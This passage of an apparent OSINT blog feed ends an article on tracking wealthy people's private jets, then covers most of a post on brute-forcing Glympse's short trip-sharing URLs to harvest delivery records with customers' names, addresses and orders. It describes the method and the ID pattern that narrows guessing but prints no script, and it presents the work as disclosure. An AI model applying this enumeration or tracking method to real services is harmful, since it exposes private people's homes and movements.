        src=&quot;/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png&quot;
        srcset=&quot;/static/aaa15d04b65f0f467c67455af9165730/12f09/countries.png 148w,
/static/aaa15d04b65f0f467c67455af9165730/e4a3f/countries.png 295w,
/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;A significant portion of these aircraft are held by LLCs, LTDs, and Inc entities. This trend in ownership structure is indicative of attempts to manage privacy, liability, and sometimes, to leverage financial benefits. The complexity of these structures can often mirror the intricate financial and legal arrangements typical of HNWI affairs.&lt;/p&gt;
&lt;h2&gt;Co-location Analysis&lt;/h2&gt;
&lt;p&gt;Below is a co-location matrix showing how often different pairs of aircraft were co-located throughout 2023.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 89.1891891891892%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAIAAADUsmlHAAAACXBIWXMAAAsSAAALEgHS3X78AAAEB0lEQVQ4yy2T7U9bVRzH71/iWzGYTXpv4dKeh3t7oS3DsQiiLlFf+gLHQ9v73HvbMg3BJSbGGE0wCw8Ddb5x2RjgMEMhuFFK2SBzPJRR2lIeRp+L0ZK2XuJenOTk98v3nM/v+z2HKJVKuVx2O5J49Ph5cHVraXUzGNwIrkYePgxNP/hzemZxYWl9eTWyFN4KhjeXg5uPljcOT/LVSqRSzhO5XD6290JThk2vd7HNMmQEWNcLGJkh3QjxuMGDm3mIZIBFyIpsnZsy9dy5u/rPv1oqtUBks7m96I4euEXWXmMcCnTI0OwCTSpT74FYQFYBt0qoSQNNCrTLbINI0e67k0+2TwePC2EiXyjsx6O+GxMmq4t9X4PtCmB5S4cP2yR4RYJOmflQBu1+S7sGO72MTTU5xXu/PfkjM7STWSOKxdPDg4Suj5C1XdghAcyji92AlTDlBsCNaDe08xDLwBiHE2wmD0n2Tk6Gbh/dXj9+RuTzhehuRAuMkhe6UYtqtSuI7DNmRvU8MLAtArgkQc5r5WTQLNvMgol2T06tfBO9t5aOErn8uWF6/wRV14cv67BFww08sGuMWYBNCsYyalOR3Q/tGmzx2hpkslGYmgkPbswuRJ8TmUz26HBf941QtV2sXYQcj009wCYydX3I0odpF7Z7ECNBRkQsb6M8pLl3amr5s/DvKwcJIhaP7yf2NP8oebGbaVWAQ0aG280qpo2EeNzogZclxHmBge1Q2HoD2zU1ExpYnF+MRF5F5ft8lKS62Q4FtknQ6gJvKxjwyMkbtzFXeHjJC1oV1CYxQDIx7unZ5S8ezId240ShWNyPRfXBCdLiYq76YKduEFo7/JiVYZuCnCr+QAVtAWu7D3boLKuZ7PLUXPjLX+ZXtmLnbicTe7p/nHqzh3HokFMx6YasxlACQhKmRehUENYQlKFN5SiJovj7Mytf/zi/9DRy7nZ0Z9t744c67EEf+SxXdcAJje8FUJNifUcBrSr42GvpvN7Yrlnf9TKc9laLcn8+/N3Q3PpfCaJQKMZjLwLaGF3b0+TUWE7lSDfLejmKt0GRo0XWodgYzcZ6bVix1/E05Zn+deX7r2ZDj7eI4unfBrYoD9e89okZC6TFQ9V8StK8uabbRPVRF3pJxkM1SCaaJxs99Bu9NTXX7syEvlV/XluKEKXSWS6TvvXTXG/fkDwwLlwfE4WbQv+4LAwL+rCkDEsDo6J/QuwfFwNjsjDSI9wMPt2ZGZnbebZHVKvVcrmcTCaOjvYTib14LJo8iB8e/L/fPT4+SCZiRnE/ETs6TMbiu0bx7KxkqCqVyitxNptNpdIpY6UzmXTGCD91korHjROPM5nMy5cnRsd4i+lU2vj/5UrZUFYr1f8ADS5DfccX4TYAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Colo Matrix&quot;
        title=&quot;Colo Matrix&quot;
        src=&quot;/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png&quot;
        srcset=&quot;/static/7a884a9c4587747dec153c760e6e8010/12f09/matrix.png 148w,
/static/7a884a9c4587747dec153c760e6e8010/e4a3f/matrix.png 295w,
/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The matrix’s substantial co-location primarily stems from the frequent use of major airports like London, Dubai, and Washington, which is evident from the abundance of green and yellow on the chart. This kind of analysis can be valuable for identifying patterns in the movements of HNWIs, as well as their potential business and personal connections, should you try and recreate something similar for your own investigation. &lt;/p&gt;
&lt;p&gt;To identify airports exhibiting anomalous spikes in activity, I analysed variations in yearly traffic patterns. This approach highlighted Hong Kong International Airport, which displayed a notable surge in activity around March 2023, indicating a period of unusual busyness.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.45945945945946%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsSAAALEgHS3X78AAABgUlEQVQoz3VT2XLDIAz0//9fH9s+tOmROjFgjDgMqlYObppJmNFICCStFjHUWnldV5VbO6XE1loVY4yKc079j+IGbEop6uwH85K4iG6tcl+ttd3uSfr9a/smYVPtfORAmVMuDwNR4J49YNOdFyxs5sjH88I/07KjQwD0Pbsv2AMRKUK0B0RA5kPi0QT+ODqOqXAuK+c7aJtIlliKhSdHW0KQ3Kv4kPn75HUPHl8Pk15MedVCvYM/bpuCQDdPzz/qGbz3WrEIirME25kUFQTJz5bYSXKKmY2cB9GBkhZEwkW6QcJR6KlVONQ6gggJgAYaLWAhCXwnS1rw7ctqFyh6Ekq2rhJ/jp5T2UANyl3Ke2sxZdUgHBdICizSLjgczaLInCctBp5RZLlMhCYE7I7ket76K26v17SIlXECQiSocnaQR3t5n/6/srYbIxNFdcDuc9ltcBxClL0gAeKwUQD+Zh/kvGoH+EHKIQLXsvEWQtjnDHafU3y7/kuIwm4jCRY05BcRxay3o1HhyAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;HKIA&quot;
        title=&quot;HKIA&quot;
        src=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png&quot;
        srcset=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/12f09/hkia.png 148w,
/static/d4a2ef8667bcd05209e62b64de131ef7/e4a3f/hkia.png 295w,
/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;During the unusual activity period at Hong Kong, the aircaft were exclusively leased or hired private jets, as opposed to private planes owned by HNWIs. To maintain privacy and avoid unintentionally doxxing, details about the real/beneficial owners or lessees of the aircraft have not been disclosed. However, those familiar with OSINT will recognise the potential value of exploring corporate records and social media intelligence to ascertain the identities of individuals travelling on aircraft within a given timeframe. While a detailed discussion of these methods is beyond the scope of this article, numerous online resources are available for those interested in learning more.&lt;/p&gt;
&lt;p&gt;The spike in activity at Hong Kong airport does coincide with Hong Kong Art Basel, a prestigious event in the world of contemporary art. Art Basel, a series of international art fairs held annually in Hong Kong, Basel, and Miami, showcases a wide array of modern and contemporary artworks from established and emerging artists, presented by leading galleries. This event has become a magnet for billionaires and art connoisseurs due to its reputation as a hub for significant art transactions and networking opportunities. The fair is not only a platform for buying and selling high-value artworks but also serves as a cultural and social gathering, attracting a global audience that includes collectors, museum directors, curators, and art enthusiasts. As a result, it’s a key event on the social calendars of the wealthy, often leading to an increase in private jet traffic to the host cities during these fairs. While correlation is not causation, there is a realistic possibility that the spike in HNWI air traffic is related.&lt;/p&gt;
&lt;h2&gt;So What?&lt;/h2&gt;
&lt;p&gt;The act of removing or blocking flight data from public tracking sites is a double-edged sword. On one hand, it serves the legitimate interest of providing privacy for HNWIs and corporations. However, this very act of concealment can sometimes draw more attention, paradoxically highlighting the individuals or entities as subjects of interest.&lt;/p&gt;
&lt;p&gt;The tracking and public dissemination of flight data also bring to the forefront concerns about the security and privacy of individuals. There is a fine line between public interest and invasion of privacy, and the potential for misuse of this data for malicious purposes cannot be overlooked. Legal approaches to the removal of data are effective and worthwhile but when they can be circumvented by aggregation elsewhere HNWIs should consider engaging OSINT experts to supplement legal strategies.&lt;/p&gt;
&lt;p&gt;Feel free to reach out if you have any questions, I can be found on &lt;a href=&quot;https://twitter.com/df_works&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.reddit.com/user/df_works&quot;&gt;Reddit&lt;/a&gt; and &lt;a href=&quot;https://www.linkedin.com/in/daniel-faram-71b610219/&quot;&gt;LinkedIn&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Please also check out my other OSINT project &lt;a href=&quot;https://reversepp.com&quot;&gt;ReversePP&lt;/a&gt;, a planning application aggregator.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[I know what pizza you ordered!]]></title><description><![CDATA[Glympse is a journey sharing and location tracking application that helps either individual users or enterprise partners with deliveries and…]]></description><link>https://dfworks.com/blog/pizza_order/</link><guid isPermaLink="false">https://dfworks.com/blog/pizza_order/</guid><pubDate>Fri, 10 Mar 2023 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Glympse is a journey sharing and location tracking application that helps either individual users or enterprise partners with deliveries and other trips. The Glympse website suggests that their userbase includes over 200k+ mobile worker devices, over 30M+ consumer devices and the Glympse android app has had around 5 million downloads.&lt;/p&gt;
&lt;p&gt;On any given day, primarily in the United States, Glympse shares the exact routes of many individuals as well as delivery information, package details, driver information and whatever other information or metadata their enterprise partners wish to attach to their trips. Understandably, this information makes life easier for drivers as well as package recipients.&lt;/p&gt;
&lt;p&gt;As you can imagine, much of this information is intended to be private and was given to Glympse (or an enterprise partner) on the understanding that it would be adequately protected and not publicly available. If these protections are not in place then there is potential that this information, either aggregated or in isolation, could be hugely useful to a social engineer or competitor. I think a phishing email containing real delivery and package information would be very convincing! I’m less confident that Pizza Hut would like to know Papa John’s most popular pizza, but you never know!&lt;/p&gt;
&lt;h3&gt;The Application&lt;/h3&gt;
&lt;p&gt;For the individual user, the UI is fairly simple and what you might expect of an application of this kind.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/e3f06/monica.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 133.1081081081081%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGgAAAQUBAAAAAAAAAAAAAAAAAAECAwQFBv/EABYBAQEBAAAAAAAAAAAAAAAAAAABAv/aAAwDAQACEAMQAAAB1EsKnOjw25InphATX//EABoQAQACAwEAAAAAAAAAAAAAAAEAMQIDEBH/2gAIAQEAAQUCdOuGnCeQ42PGyyN//8QAFxEAAwEAAAAAAAAAAAAAAAAAAAIREP/aAAgBAwEBPwGEFz//xAAZEQACAwEAAAAAAAAAAAAAAAAAAQIQERL/2gAIAQIBAT8B6ZrJV//EABkQAQACAwAAAAAAAAAAAAAAAAEQMgAgcf/aAAgBAQAGPwKhlDRlh7H/xAAcEAACAgMBAQAAAAAAAAAAAAAAAREhEEGhMXH/2gAIAQEAAT8hjUEOwd3DasRrcknUasd2N27D1+n/2gAMAwEAAgADAAAAEHc3Qv/EABgRAQADAQAAAAAAAAAAAAAAABEAARAh/9oACAEDAQE/ECsEvZ3P/8QAGREAAgMBAAAAAAAAAAAAAAAAAAEQESFh/9oACAECAQE/EMKs6CJPI//EAB8QAQACAQQDAQAAAAAAAAAAAAEAESFhcaGxMUFRgf/aAAgBAQABPxC3bezE5drGGGEGLA6ywFZWX60lC1aCcx3FEWTqHn9nIdwCLPszBdMNpzXc/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Monica&quot;
        title=&quot;Monica&quot;
        src=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/1c72d/monica.jpg&quot;
        srcset=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/a80bd/monica.jpg 148w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/1c91a/monica.jpg 295w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/1c72d/monica.jpg 590w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/e3f06/monica.jpg 643w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This image was taken from Glympse’s website and as you can see there isn’t anything hugely compromising and only a first name is available. You have a start location, an end location, a route and some timing information. In this instance, “Monica” is walking to the Seattle Space Needle and it is going to take her about 11 minutes. All useful information she might share with a friend she is meeting (Monica is a dummy account just in case you were wondering).&lt;/p&gt;
&lt;p&gt;However, here is another example. I have hidden the last name, profile image and exact end location but you can see how this is potentially more problematic (the link is no longer live before you try!). Identifying an individual who has ended their trip at a home address (or residential location) is a breach of privacy and this information starts to become useful to criminals - if not cyberattackers then at the very least opportunistic burglars!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e878c385405f4429a9f757a9dae2396b/d67ca/paul.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 73.64864864864865%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAABcRAAAXEQHKJvM/AAADvElEQVQ4y12T62ubZRjG3/9KdPPTBBkyFB1qXdNNhxNBBts+yoQh/eDwgzBXlqRpk55pesi5adLT2rR1TZvYnLq2a05v3mPeNEmb6VDw59NuH8QPP+734Xm5uO77uh9pKZFlMZEntJhmaGoVz+Qyg5OrDHpXGfNvMh58ds5EIMlkcEfUrfP6f7zB1Pk/0u3vHdx54OH2Dy7e/bSXd672cvn6j1z5spf3bQ/54MZDLtt+4tL1+1yw3eVSzwMu9tzjou0eF3ru8nb3Hd7qEti+470b95F+Du9zazCLelQk8KzMQELhqFpG1zNo9SaaaWEaL8k011lseIkpWYKWnWjDQ/x4hPn6MFFtjKS1SqVZRhpbL/HLQo2/2x3+efUXL1912HqRYK8aIScn2ClucKBlODxOkjleY664Q/BoiN/UBQ5qh+wr+xQq+xSrGhVFR2q125yentLsdGi0TjluG0SqI4TKDgpWgKg5TkgZYKnkJ16bxl9cF/dudvUVTM3AMBRUpYpuVKlbCpLWaKFaTcxWm3rzlHpHZ7kySVgeZvu4n7jqIXg4wXxxjFl5nMlKFG/NjjM9z9zvCpG0IqpKOKUQ2xWCJVlFMRvIYlZWo0PpZB+f6mT+aIKMFWHX9LKgelkSLY4XY0RMF+69UT57kuOTvqwgw1XBR79m+GogjyTrJjXDolyzyBhpVuo+/EY/4ZqHpLJI7niULWuNuLyHTxliru5k9iBOT3+Oa8483f15bIIuR45vhwtIVa2BWT8VM0nj1/rPCWguorqHHW2Fzdooy0qAZWORkO5ksxEmeajS7czxheO16Bmf23N84xGCOTnPshwiaLjOhUK6mxnVzooxxYbiY6IcZMfwk7CmmFYdYq5xtp7rQiQrBPNvBHNCMM+toSxSSBvEpz8WYoPCnYtZ7Qkxc4R0M0xYH2RErNCa6eGwtSTO48TNYbFWVdFy4T8Oc3TZC9z0pJDC+jDT8gzTpQjByjwb9ahwEWHOcDN+9JQZcRc27GQbY/j1flK1BEnh8Lrr9fx63nDNUeDr4TTSdGmFWDFCXKS6UJ0gpkWZLEcEUaYrc2IEwrU6QKLhYKM2QbGmkMjLfPx4lw9FsmecJXzlURabaxdpQSQWlu34TScBke6s2odPtO47C8gQ37qdgBBd0r3U9E10q0VqX6YvdoB9qYh7tYJrpcSj+QNGEi+QgmU3T+shDqw9nusF0qU029VNUtoWKXWbHXWLjJqhLLah0ayI15DEtGTxuk5onzRFbfPnHx1aLYt2U+FfIpXH2qq1d7MAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Paul&quot;
        title=&quot;Paul&quot;
        src=&quot;/static/e878c385405f4429a9f757a9dae2396b/fcda8/paul.png&quot;
        srcset=&quot;/static/e878c385405f4429a9f757a9dae2396b/12f09/paul.png 148w,
/static/e878c385405f4429a9f757a9dae2396b/e4a3f/paul.png 295w,
/static/e878c385405f4429a9f757a9dae2396b/fcda8/paul.png 590w,
/static/e878c385405f4429a9f757a9dae2396b/d67ca/paul.png 714w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The eagle-eyed amongst you might see where this is going.&lt;/p&gt;
&lt;p&gt;The URL (&lt;a href=&quot;https://glympse.com/0HG4-HX6J&quot;&gt;https://glympse.com/0HG4-HX6J&lt;/a&gt;) has a fairly short unique identifier appended on the end. &lt;em&gt;0HG4-HX6J&lt;/em&gt; has 9 characters and uses uppercase, special and numerical characters.&lt;/p&gt;
&lt;p&gt;By way of comparison, most online sharefile software that generate random URLs often have upwards of 20 characters; inclusive of uppercase, lowercase, numbers and special characters (Aj5ye&amp;#x26;hsk8Pq@3Hh%#3Q), which is many magnitudes harder to brute force or guess.&lt;/p&gt;
&lt;p&gt;Using a Python script to generate alphanumerical codes 9 characters in length, and check if they are valid by firing an HTTP request to Glympse was initially sluggish. Even though it is a comparatively short URL ID there are still around 2 * 10^16 combinations to get through – slow progress if you need to remain below the threshold of any potential rate limiters. &lt;/p&gt;
&lt;p&gt;However, after playing around with the app I identified a pattern! All the URL suffixes started with a zero, had a hyphen as the 5th character and no other special charachters which reduces the combination space significantly (to approximately 9 * 10^10).&lt;/p&gt;
&lt;p&gt;A few tweaks to the Python script and it was possible to harvest thousands of valid URLs in just a few hours. This included many trips where the Glympse application had been white labelled by their enterprise partners!&lt;/p&gt;
&lt;h3&gt;Papa John’s&lt;/h3&gt;
&lt;p&gt;Many of the URLs which resolved to a trip were Papa John’s pizza deliveries. The HTTP response included information about with which items had been ordered, an address and in some responses, a name and telephone number (unclear if that is the driver or the recipient). There was also the option to leave a review for some of the trips which could potentially be abused if it is available for people other than the customer (Pizza Hut sponsored data pollution attack??)&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/988a96bcdb90d448068f6481ded856f6/ecfa6/papajohns_review.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 54.05405405405405%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7CAAAOwgEVKEqAAAACH0lEQVQoz11S227TQBD1h/LKH/AG4WIn67V313e3QqgSgqeiICGkNrSE2xNSH1Gl3kJpHOcCoogqgUai5DC7cQzi4Wi865kzZ86O1X39BrvdV+i82EFnZ9fg4NMZBhffURLG0ylGsxl6wyH6xQBnRYnT/gDlaIzjXg/bpualic+3tmFxX8CXClIFUARXKXSjFPtcYj9McJTfx7E+P2njx/wnytMDHH7Yw/nXLygGJRr3HNy2mwYN24YVJSnCOIGOQRRDUXwaxngXxOh4AltugK4n8X5zE6PpAkcfJ5iVJ7iazzAcT8CFgq8icBKlYTFfQsOlH+abSFxqwLI1uHmKeOMBeL6Ox+02fl0Bw4tLnHw7xwLAZPLZELrCQ9Nn4EosCV1DKkys4VVWhBJ3HQcbDx8BvxfY6x+CvX2G2fwSRVHA4S04HkPT8xEksSYUqFUapdJYkGQ5kpSQZfSPg5EKEZPPcYQ8W6fiDAHleaRKhhEU+Z2ma/+OLGtiFSWI05QSQ3hyaUWLFDS5hxb3SZVPZ7GcSggiyuEmAneiJiyd6GqV2rsqgdVRVoUrW/76rb1zODcPoRXfimxc869XHpI63ZnVRcLc1Q/136OZSA1blOfRqml7YtqOG8FNWKvCVYFWJIKARs7MKim9SgSzHkFIKxIaVayaQJF/td9UYzVsBodx2ARNqo2O4sQQapjuFXma5+Yc0mvqu5DutNd1TpbiDz4cbTp9KeChAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Papa Johns 1&quot;
        title=&quot;Papa Johns 1&quot;
        src=&quot;/static/988a96bcdb90d448068f6481ded856f6/fcda8/papajohns_review.png&quot;
        srcset=&quot;/static/988a96bcdb90d448068f6481ded856f6/12f09/papajohns_review.png 148w,
/static/988a96bcdb90d448068f6481ded856f6/e4a3f/papajohns_review.png 295w,
/static/988a96bcdb90d448068f6481ded856f6/fcda8/papajohns_review.png 590w,
/static/988a96bcdb90d448068f6481ded856f6/efc66/papajohns_review.png 885w,
/static/988a96bcdb90d448068f6481ded856f6/c83ae/papajohns_review.png 1180w,
/static/988a96bcdb90d448068f6481ded856f6/ecfa6/papajohns_review.png 1819w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/220d6f27e360bf8048e7337f2c76489c/ca12d/pizza.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 15.54054054054054%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAABcRAAAXEQHKJvM/AAAAbklEQVQI132OSwqAMAxEe/876KKtV/EsKn6aKii0ydh2IYKfxWMewwSiRBgi8RPcHf9bEYE69hbOVXCLxrY18N5gXS2INMjpkrkjMhin+vKMLzuT7izm2SJGgmL2CKFL9KkYCiHePLw78/Dw/OUJqHfj3FyCgGUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pizza&quot;
        title=&quot;Pizza&quot;
        src=&quot;/static/220d6f27e360bf8048e7337f2c76489c/fcda8/pizza.png&quot;
        srcset=&quot;/static/220d6f27e360bf8048e7337f2c76489c/12f09/pizza.png 148w,
/static/220d6f27e360bf8048e7337f2c76489c/e4a3f/pizza.png 295w,
/static/220d6f27e360bf8048e7337f2c76489c/fcda8/pizza.png 590w,
/static/220d6f27e360bf8048e7337f2c76489c/ca12d/pizza.png 647w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Pottery Barn&lt;/h3&gt;
&lt;p&gt;Some of the URLs resolved to Pottery Barn deliveries. The data which could be captured from HTTP responses included addresses, recipient first and last names and the time of delivery. As discussed, specific information like this could be used in a convincing phishing attack. In the European Union this information would also be considered personal information under GDPR.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/63ec5/potterybarn.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.45945945945946%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABcRAAAXEQHKJvM/AAAC5ElEQVQoz22TyW8cRRTG+z/jzCo4gODIOVIUwBxQFhASB8QhMSFiicQBEGAZ4wgSO1IQckQMeMyMp2d69i0z3T297z0z3T1j/ygPCHFISZ/qvVdVX7331SuJ/43BcEh/MCQIQxZZ/l98tTxjWZw+EUW+pFiuyPKcolgidbo9fty9w89373H5ylUuvfEmb21scP3GJtvbP3Dv/h4Dq8c0VZmEI/R4ghaPxayu4c8DbN9hkWfMihTJsQyatQoNucyw26TTkBn32/SaNTpKlUG3wYl+xNH0EWXjTxRHpmqVqOh/UNdKTN0JPW2IE4V4SYw0tGfcrdpsHw7Yky22fuvxoOGxX7P5pRWwLxsc6yfIgqTulHkcDxiFfWS9QtNoYLo6tmNgeyZ+6iJtlaY89WGZl24pPPexzPM36zy7WV3bz2zKvPiJzP12iV4ki+wqdHyFlqtQUf+iO5mgWlOSeYppadiBivSw7fH2Vof37vS5ttvj6m6Xa8J+V+DKTpfLO3UOhse0nTqyUaEiyj7SHnFilmkYfRSzi5OGWL5Hz+0iZeJlkvlijdmiEBD+IhPIidI5E3GgbdXom0NqepkT7XdGfp+RMeX9n5pc+r7GOzsdLn7b4LvSv4TxPCMVRO7cx0hNvHRBJGLJbM7UUtGsCY5tiQcYC6gkUcBEN7nwdWst1aufn8tV49avLaS8WK2z0ROdmntM1S7hxjHuLMJNA5G5WHNNNFMl9H2SJCUOfQbjMRtbLV77QuH1L5u8/Gmd2wc9pDSfo0bqWuihP6DlKIJAwwkjAiF2mhWkaYrr2YwNHT8I0Q2VvqZy4ZsmL9xUeOUzhadvVLn9cISkJxOOp4cYkS/EDXgsmjeIIzyRjSOEjmf/lO9GCWNTpzHqojqa6LmUrw41Ptirc/1Bn4/2Rxy0HKQ4FzcmY+I8Js5igsznXNfzr5SKRs2KQmAlNF4QCt8JPbyFQyT2cnZKtoo5PVuu7dPTFX8DbAp